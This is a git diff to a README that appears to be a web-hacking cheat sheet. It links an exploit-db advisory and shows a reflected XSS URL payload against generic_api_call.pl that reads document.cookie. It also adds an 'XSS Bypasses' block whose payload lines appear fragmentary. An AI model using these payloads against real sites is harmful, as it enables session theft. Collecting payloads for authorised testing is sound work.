diff --git a/README.md b/README.md index 47616f1..e9fedf7 100644 --- a/README.md +++ b/README.md @@ -2405,7 +2405,7 @@ http://host/index.php/wp-json/wp/v2/users/ ``` -- `generic_api_call.pl` XSS by [@NNPoster](https://www.exploit-db.com/?author=6654) +- [`generic_api_call.pl` XSS](https://www.exploit-db.com/exploits/30777) by [@NNPoster](https://www.exploit-db.com/?author=6654) ``` http://host/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3cscript%3ealert(document.cookie)%3c/script%3e%3cscript%3e ``` @@ -2692,6 +2692,12 @@ value=""> ``` +- [Other XSS Bypasses](https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md) +``` +>
" +>> +``` ### Apache Generic - Writing method type in lowercase by [@i_bo0om](http://twitter.com/i_bo0om)